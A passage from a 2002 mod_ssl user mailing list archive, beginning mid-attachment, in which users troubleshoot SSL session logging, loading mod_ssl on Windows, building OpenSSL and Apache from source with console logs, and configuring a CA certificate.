CisKICNpZmRlZiBTSEFSRURfTU9EVUxFCiAgICAgc3NsX2xvZyhzLCBTU0xfTE9HX0lORk8sICJJ
bml0OiAlc25pdGlhbGl6aW5nICVzIGxpYnJhcnkiLAogICAgICAgICAgICAgbWMtPm5Jbml0Q291
bnQgPT0gMSA/ICJJIiA6ICJSZWkiLCBTU0xfTElCUkFSWV9OQU1FKTsKQEAgLTI0OCwxMyArMjU1
LDYgQEAKICAgICAgICAgcmV0dXJuOwogI2VuZGlmCiAgICAgfQotCi0gICAgLyoKLSAgICAgKiBT
U0wgZXh0ZXJuYWwgY3J5cHRvIGRldmljZSAoImVuZ2luZSIpIHN1cHBvcnQKLSAgICAgKi8KLSNp
ZmRlZiBTU0xfRVhQRVJJTUVOVEFMX0VOR0lORQotICAgIHNzbF9pbml0X0VuZ2luZShzLCBwKTsK
LSNlbmRpZgogCiAgICAgLyoKICAgICAgKiBXYXJuIHRoZSB1c2VyIHRoYXQgaGUgc2hvdWxkIHVz
ZSB0aGUgc2Vzc2lvbiBjYWNoZS4K

------_=_NextPart_001_01C22DB9.EB8953DD--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 23:13:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA12407; Wed, 17 Jul 2002 23:12:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id XAA12291; Wed, 17 Jul 2002 23:11:25 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Wed, 17 Jul 2002 15:08:28 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6HLBK2B007393 for ; Wed, 17 Jul 2002 15:11:20
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Wed, 17 Jul 2002 15:11:20 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: SSL cached sessions
Date: Wed, 17 Jul 2002 15:11:20 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 112B03461030389-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is it possible to determine whether a current connection is part of an
existing SSL session without modifying mod_ssl?  I want to do some logging
which will only be required once per session and not once per connection.
    					-Samuel

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 01:25:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA19012; Thu, 18 Jul 2002 01:24:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id BAA19006; Thu, 18 Jul 2002 01:23:54 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6HNNpmI012222
	for ; Thu, 18 Jul 2002 09:23:52 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADF42577;
	Thu, 18 Jul 2002 09:23:51 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6HNNotN011634
	for ; Thu, 18 Jul 2002 09:23:50 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdxda4Sw; Thu Jul 18 09:23:47 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6HNNj7a006697
	for modssl-users@modssl.org; Thu, 18 Jul 2002 09:23:45 +1000 (EST)
Date: Thu, 18 Jul 2002 09:23:45 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Message-ID: <20020718092345.A6570@uow.edu.au>
References: <200207170205.AA167051714@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <200207170205.AA167051714@lopette.org>; from arcean@lopette.org on Wed, Jul 17, 2002 at 02:05:12AM -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Guillaume wrote::
> >> I guess this is what you're looking for:
> >> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip

Brendan replied:
> > I'm somewhat confused.
> > I downloaded and uncompressed the above archive, uncompressed and
> > was delighted to find that mod_ssl was present in the modules 
> > directory. But I couldn't find any openssl.exe [...]

arcean followed with:
> www.openssl.org/download/win32 ?? :)

As notified yesterday I've found what I needed. My point was
that I couldn't find the openssl.exe in the
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip archive,
so I had to download it separately.

Kind regards,
Brendan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 01:48:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA19887; Thu, 18 Jul 2002 01:47:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from odin.its.uow.edu.au id BAA19866; Thu, 18 Jul 2002 01:46:09 +0200 (MET DST)
Received: from mimir.its.uow.edu.au (mimir.its.uow.edu.au [130.130.68.27])
	by odin.its.uow.edu.au (8.12.3/8.12.3) with ESMTP id g6HNk7mE016606
	for ; Thu, 18 Jul 2002 09:46:07 +1000 (EST)
Received: from chac.its.uow.edu.au (chac.its.uow.edu.au [130.130.68.5])
	by mimir.its.uow.edu.au (Mirapoint Messaging Server MOS 2.9.3.2)
	with ESMTP id ADF44075;
	Thu, 18 Jul 2002 09:46:07 +1000 (EST)
Received: (from sendmail@localhost)
	by chac.its.uow.edu.au (8.12.3/8.12.3) id g6HNk792016511
	for ; Thu, 18 Jul 2002 09:46:07 +1000 (EST)
Received: from wumpus.its.uow.edu.au(130.130.68.12)
	via SMTP by chac.its.uow.edu.au, id smtpdaSaqpG; Thu Jul 18 09:46:05 2002
Received: (from blloyd@localhost)
	by wumpus.its.uow.edu.au (8.12.3/8.12.3) id g6HNk4Bt008210
	for modssl-users@modssl.org; Thu, 18 Jul 2002 09:46:04 +1000 (EST)
Date: Thu, 18 Jul 2002 09:46:04 +1000
From: Brendan Lloyd 
To: modssl-users@modssl.org
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
Message-ID: <20020718094604.C6570@uow.edu.au>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from a.moon@mdx.ac.uk on Wed, Jul 17, 2002 at 11:37:20AM +0100
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brendan Lloyd 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Alex wrote:
> I've been trying to get apache 2.0.39 +modssl to work under winNT. 
>  But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
> apache mod_ssl.so module to load.  It comes up with the following:
> 
> Cannot load C:/apache2/modules/mod_ssl.so into server: The operating 
> system cannot run %1

Experienced the same prob myself just yesterday. Consider the
following checklist:

* Download Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Win32.zip
  from www.modssl.org/contrib

* Download latest OpenSSL binary for Win32 from same location

* Unzip the apache archive into where you want your Apache to live

* Unzip the OpenSSL archive where you want your OpenSSl to live

* Ensure that your Path (System variable) is set to include the OpenSSL
  directory (wherever you chose to install it). (You can set the path
  by hitting Windows and Pause/Break keys, which will bring up the System
  Properties dialog. Under NT you select Environment tab and then select Path
  from the list of System Variables, then type to change it).
  As an additional measure, you may find that copying the .dll files (that
  are in the same directory as openssl.exe) to WINNT/System32 helps (although
  setting the path should also achieve the same end result)

* Make sure your httpd.conf includes both the LoadModule and AddModule
  directives

If I think of anything else, I'll let you know. I can also forward you some
troubleshooting emails (provided to me by a colleague) if the above does not
help?

Good luck!
Brendan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 03:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA23200; Thu, 18 Jul 2002 03:05:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA23173; Thu, 18 Jul 2002 03:04:16 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id ECB894CE748; Thu, 18 Jul 2002 03:04:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 28A6C28707; Wed, 17 Jul 2002 21:07:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id TAA00647; Wed, 17 Jul 2002 19:13:26 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g6HHDPt14618619;
	Wed, 17 Jul 2002 19:13:25 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0wGIC; Wed Jul 17 19:13:17 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id TAA03008;
	Wed, 17 Jul 2002 19:13:05 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id TAA35518;
	Wed, 17 Jul 2002 19:13:05 +0200 (METDST)
Date: Wed, 17 Jul 2002 19:13:05 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Cc: oliver@x509security.com
Subject: Re: fakebasicauth documentation is *wrong* and doesn't work for me
Message-ID: <20020717191305.A6374445@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org, oliver@x509security.com
References: <00ec01c22d7b$7cdd4b20$0200a8c0@x509security>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00ec01c22d7b$7cdd4b20$0200a8c0@x509security>; from oliver@x509security.com on Wed, Jul 17, 2002 at 08:19:49PM +1000
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Wed, Jul 17, 2002 at 08:19:49PM +1000, Oliver Bode wrote:
> What is "xxj31ZMTZzkVA" ?

It's what you get when crypt()ing "password" using the salt "xx".
Your "KI5eE8rTJvs.U" is the result of crypt()ing "password" using
the salt "KI".

I can't help you with your main problem, though. Sorry.


Ciao

Thomas


-- 
"Give me enough medals, and I'll win any war."
		-- Napoleon
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 03:06:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA23208; Thu, 18 Jul 2002 03:05:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA23172; Thu, 18 Jul 2002 03:04:16 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CCEDE4CE729; Thu, 18 Jul 2002 03:04:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 418B228693; Wed, 17 Jul 2002 21:06:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id SAA29591; Wed, 17 Jul 2002 18:59:41 +0200 (MET DST)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 17 Jul 2002 09:56:06 -0700
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD88@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: RE: modssl with a shared ssl lib base
Date: Wed, 17 Jul 2002 09:55:56 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What is the environment you are working on (OS, Compiler, etc)?  Also, check
out the documentation located at www.modssl.org (install document).  If you
are building on Solaris drop another line and I will forward you some
information (I just spent some time debugging an issue with gcc and Solaris
8).

-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com]
Sent: Wednesday, July 17, 2002 9:53 AM
To: modssl-users@modssl.org
Subject: modssl with a shared ssl lib base


Since apache 2.0.X will not function with older kernels, we have been
trying to upgrade to apache_1.3.26 and wheen out of reliance for present
upon the mod_blowchunks.so thing we have implimented till time permitted.
But, we had decided to build ssl-engine with shared capability, so as to
not have to jump through hoops if matters with apache 2.0.X changed and
such.  But, we are failing to get a working httpd when going this route.
I'm wondering if the older apache fails, at least on older kernels, when
ssl has been compiled as an so?

Thanks,


Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 03:14:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA24069; Thu, 18 Jul 2002 03:13:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts17-srv.bellnexxia.net id DAA24044; Thu, 18 Jul 2002 03:12:50 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.173])
          by tomts17-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020718011248.VQNX4312.tomts17-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 17 Jul 2002 21:12:48 -0400
Message-ID: <3D361618.2070306@sympatico.ca>
Date: Wed, 17 Jul 2002 21:12:56 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
References: <200207170812.AA705298848@lopette.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

arcean wrote:
> ---------- Original Message ----------------------------------
> From: hunter 
> Reply-To: modssl-users@modssl.org
> Date:  Wed, 17 Jul 2002 09:22:37 -0400
> 
> 
>>arcean wrote:
>>
>>>---------- Original Message ----------------------------------
>>>From: Alex Moon 
>>>Reply-To: modssl-users@modssl.org
>>>Date:  Wed, 17 Jul 2002 11:37:20 +0100
>>>
>>>
>>>
>>>>I've been trying to get apache 2.0.39 +modssl to work under winNT. 
>>>>But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
>>>>apache mod_ssl.so module to load.  It comes up with the following:
>>>
>>>
>>>with apache 1.3.2* under windows (not cygwin) you had to load .DDL 
>>>and  not .SO
>>>
>>>maybe it a way to search
>>>
>>
> [over load sniped ... ]
> 
> I said :
> "with apache 1.3.2* under windows (not cygwin) you had 
> to load .DDL"
>              ^^^^^^                ^^^^^^^^^^^
> not cygwin, native win32 if you prefer (with DLL)
> 1.3.2* like 1.3.20 or 1.3.26 ... not 1.0.39 
> (not sure it existes)
> 
> i know my english is bad but ....
> 
> with cygwin i never try 
> 
> 
>>I have not done this for several weeks and maybe the distribution has 
>>changed, but...
>>
>>mod_ssl.so was not built with Apache 1.0.39
>>
>>...you have to build it.
>>
>>1. place openssl into ?:\httpd-2.0.39\srclib ... there are instructions 
>>somewhere to follow...
>>2. follow the instructions in openssl and build it ... you need masm7, 
>>perl, vc6, etc.
>>3. build apache ... it finds openssl and builds mod_ssl.so ... you need 
>>awk, bison, sed and flex (new cygwin)
>>
>>... I had to get newer version of cygwin before it worked, but then the 
>>newer perl was a problem.
>>... older perl must be in path before cygwin
>>
>>After it all comes to gether you can use nmake -f makefile.win installr
>>
>>Then I had trouble making certs...
>>
>>Try these hints ... I will make more detailed instructions later if 
>>needed but I think the newer packages (must) probably work better than 
>>what I used ... but I have not checked.
>>
>>I will have to download new source and try again to know what the 
>>situation is and I am sorry but I have to run off to work.  Later, ok?
>>
>>Chris.
>>
>>
>>
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
> 
> 
> 
> __________________________________________________
> D O T E A S Y - "Join the web hosting revolution!"
>              http://www.doteasy.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

I'm sorry I failed to make it clear when I replied - I was in a hurry to 
get to work.

The compile is with vc6 or vc 7 but some of the cygwin (unix) tools are 
used and must be avaialble.  I don't use cygwin to build Apache or openssl.

If you are still having trouble ... I am going to get the latest source 
now and see if the build conditions are the same as when I built mine. 
If they are then I think I can help you ... I worked through similar 
difficulties already.

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 03:29:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA24615; Thu, 18 Jul 2002 03:28:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from troy.barwonwater.vic.gov.au id DAA24596; Thu, 18 Jul 2002 03:28:04 +0200 (MET DST)
Received: from barwonwater.vic.gov.au (matrix.is.barwonwater.vic.gov.au [138.19.9.83])
	by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id LAA00101
	for ; Thu, 18 Jul 2002 11:27:56 +1000 (EST)
Message-ID: <3D36199C.6090100@barwonwater.vic.gov.au>
Date: Thu, 18 Jul 2002 11:27:56 +1000
From: Christopher Welsh 
Organization: Barwon Water
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Netscape does not recognise my CA - RESOLVED.
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Welsh 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for those who replied. Turns I did not add:

SSLCACertificateFile /opt/apache/conf/ssl.crt/ca.crt to httpd.conf

This deals with browsers that do not know the CA.

-- 
Christopher Welsh
Barwon Regional Water Authority,
Geelong Victoria, 3216
Voice: 03 52 262385, Mobile: 0409 562968



*********************************************************************************************


The information in this e-mail message and any files transmitted with it
are confidential
and/or privileged and are intended only for the use of the individual or
entity to whom
they are addressed.  If you received this message in error please notify us
immediately
by telephone or return e-mail and delete all copies from your computer
system, as your
retention, distribution or copying of this message and files is strictly
prohibited.

It is the recipient's responsibility to check this message and files for
viruses.

***********************************************************************************************


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 04:42:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA27373; Thu, 18 Jul 2002 04:41:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts6-srv.bellnexxia.net id EAA27356; Thu, 18 Jul 2002 04:40:40 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.173]) by tomts6-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020718024017.WYG8251.tomts6-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 17 Jul 2002 22:40:17 -0400
Message-ID: <3D362AAE.1030400@sympatico.ca>
Date: Wed, 17 Jul 2002 22:40:46 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
CC: modssl-users@modssl.org
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
References: <200207170537.AA2007040044@lopette.org> <3D356F9D.2030404@sympatico.ca>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I apologize for the sloppiness...

hunter wrote:
> arcean wrote:
> 
(snip)
> I will have to download new source and try again to know what the 
> situation is and I am sorry but I have to run off to work.  Later, ok?
> 
> Chris.
> 
I have not located an msi installer for Apache 2.0.39
These are the steps that I followed build it from source.

1. Download httpd-2.0.39-win32-src.zip
2. Unzip into directory httpd-2.0.39
3. Create directory ?:\httpd-2.0.39\srclib\openssl
4. Extract openssl-0.9.6d.tar.gz
5. Copy the contents of \openssl-0.9.6d to \httpd-2.0.39\srclib\openssl
6. Go to :\httpd-2.0.39\srclib\openssl follow instructions in INSTALL.W32

Bellow is the results mixed within the instructionss...

  Visual C++
  ----------

  First should run Configure:

  > perl Configure VC-WIN32

2002.07.17 21.47.37.13
[I:\httpd-2.0.39\srclib\openssl]perl configure VC-WIN32
Configuring for VC-WIN32
IsWindows=1
CC            =cl
CFLAG         =-DTHREADS  -DDSO_WIN32
EX_LIBS       =
BN_ASM        =bn_asm.o
DES_ENC       =des_enc.o fcrypt_b.o
BF_ENC        =bf_enc.o
CAST_ENC      =c_enc.o
RC4_ENC       =rc4_enc.o
RC5_ENC       =rc5_enc.o
MD5_OBJ_ASM   =
SHA1_OBJ_ASM  =
RMD160_OBJ_ASM=
PROCESSOR     =
RANLIB        =/usr/bin/ranlib
PERL          =/usr/bin/perl
THIRTY_TWO_BIT mode
BN_LLONG mode
RC4_INDEX mode
RC4_CHUNK is undefined

Configured for VC-WIN32.

2002.07.17 21.48.04.99
[I:\httpd-2.0.39\srclib\openssl]

  Next you need to build the Makefiles and optionally the assembly language
  files:

  - If you are using MASM then run:

    > ms\do_masm

2002.07.17 21.48.04.99
[I:\httpd-2.0.39\srclib\openssl]ms\do_masm
Generating x86 for MASM assember
Bignum
DES
"crypt(3)"
Blowfish
CAST5
RC4
MD5
SHA1
RIPEMD160
RC5\32

2002.07.17 21.49.00.49
[I:\httpd-2.0.39\srclib\openssl]perl util\mkfiles.pl  1>MINFO

2002.07.17 21.49.00.85
[I:\httpd-2.0.39\srclib\openssl]rem perl util\mk1mf.pl VC-MSDOS no-sock 
 >ms\msdos.mak

2002.07.17 21.49.00.85
[I:\httpd-2.0.39\srclib\openssl]rem perl util\mk1mf.pl VC-W31-32 >ms\w31.mak

2002.07.17 21.49.00.85
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl dll VC-W31-32 
1>ms\w31dll.mak
unknown option -

2002.07.17 21.49.01.34
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl VC-WIN32  1>ms\nt.mak
unknown option -

2002.07.17 21.49.01.79
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl dll VC-WIN32 
1>ms\ntdll.mak
unknown option -

2002.07.17 21.49.02.23
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 16 libeay 
1>ms\libeay16.def

2002.07.17 21.49.05.07
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 32 libeay 
1>ms\libeay32.def

2002.07.17 21.49.07.95
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 16 ssleay 
1>ms\ssleay16.def

2002.07.17 21.49.10.64
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 32 ssleay 
1>ms\ssleay32.def

2002.07.17 21.49.13.33
[I:\httpd-2.0.39\srclib\openssl]

  - If you are using NASM then run:

    > ms\do_nasm

  - If you don't want to use the assembly language files at all then run:

    > ms\do_ms

  If you get errors about things not having numbers assigned then check 
the troubleshooting section: you probably won't be able to compile it as 
it stands.

  Then from the VC++ environment at a prompt do:

  > nmake -f ms\ntdll.mak

2002.07.17 21.49.13.33
[I:\httpd-2.0.39\srclib\openssl]nmake -f ms\ntdll.mak

Microsoft (R) Program Maintenance Utility   Version 6.00.8168.0
Copyright (C) Microsoft Corp 1988-1998. All rights reserved.

' in macroak(239) : fatal error U1001: syntax error : illegal character '
Stop.

2002.07.17 21.50.09.96
[I:\httpd-2.0.39\srclib\openssl]nmake -f ms\ntdll.mak


   in macroak(239) : fatal error U1001: syntax error : illegal character
- this is the error you get when you use the new cygwin perl...

...make certain older perl is ahead in path and start over...


2002.07.17 21.57.07.91
[I:\httpd-2.0.39\srclib\openssl]perl configure VC-WIN32
Configuring for VC-WIN32
IsWindows=1
CC            =cl
CFLAG         =-DTHREADS  -DDSO_WIN32
EX_LIBS       =
BN_ASM        =bn_asm.o
DES_ENC       =des_enc.o fcrypt_b.o
BF_ENC        =bf_enc.o
CAST_ENC      =c_enc.o
RC4_ENC       =rc4_enc.o
RC5_ENC       =rc5_enc.o
MD5_OBJ_ASM   =
SHA1_OBJ_ASM  =
RMD160_OBJ_ASM=
PROCESSOR     =
RANLIB        =true
PERL          =perl
THIRTY_TWO_BIT mode
BN_LLONG mode
RC4_INDEX mode
RC4_CHUNK is undefined

Configured for VC-WIN32.

2002.07.17 21.57.54.71
[I:\httpd-2.0.39\srclib\openssl]

2002.07.17 21.57.54.71
[I:\httpd-2.0.39\srclib\openssl]ms\do_masm
Generating x86 for MASM assember
Bignum
DES
"crypt(3)"
Blowfish
CAST5
RC4
MD5
SHA1
RIPEMD160
RC5\32

2002.07.17 21.58.37.68
[I:\httpd-2.0.39\srclib\openssl]perl util\mkfiles.pl  1>MINFO

2002.07.17 21.58.37.86
[I:\httpd-2.0.39\srclib\openssl]rem perl util\mk1mf.pl VC-MSDOS no-sock 
 >ms\msdos.mak

2002.07.17 21.58.37.86
[I:\httpd-2.0.39\srclib\openssl]rem perl util\mk1mf.pl VC-W31-32 >ms\w31.mak

2002.07.17 21.58.37.86
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl dll VC-W31-32 
1>ms\w31dll.mak

2002.07.17 21.58.38.10
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl VC-WIN32  1>ms\nt.mak

2002.07.17 21.58.38.34
[I:\httpd-2.0.39\srclib\openssl]perl util\mk1mf.pl dll VC-WIN32 
1>ms\ntdll.mak

2002.07.17 21.58.38.58
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 16 libeay 
1>ms\libeay16.def

2002.07.17 21.58.41.09
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 32 libeay 
1>ms\libeay32.def

2002.07.17 21.58.43.69
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 16 ssleay 
1>ms\ssleay16.def

2002.07.17 21.58.46.07
[I:\httpd-2.0.39\srclib\openssl]perl util\mkdef.pl 32 ssleay 
1>ms\ssleay32.def

2002.07.17 21.58.48.42
[I:\httpd-2.0.39\srclib\openssl]


... LONG BUILD ... make certain there are no errors .. the test


